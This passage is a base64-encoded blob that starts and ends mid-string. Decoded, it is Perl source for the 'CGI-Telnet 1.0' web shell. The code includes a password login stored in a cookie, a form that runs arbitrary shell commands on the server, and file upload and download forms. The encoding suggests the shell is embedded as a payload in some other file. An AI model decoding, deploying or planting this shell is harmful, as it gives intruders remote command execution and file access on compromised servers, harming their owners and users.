XJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiID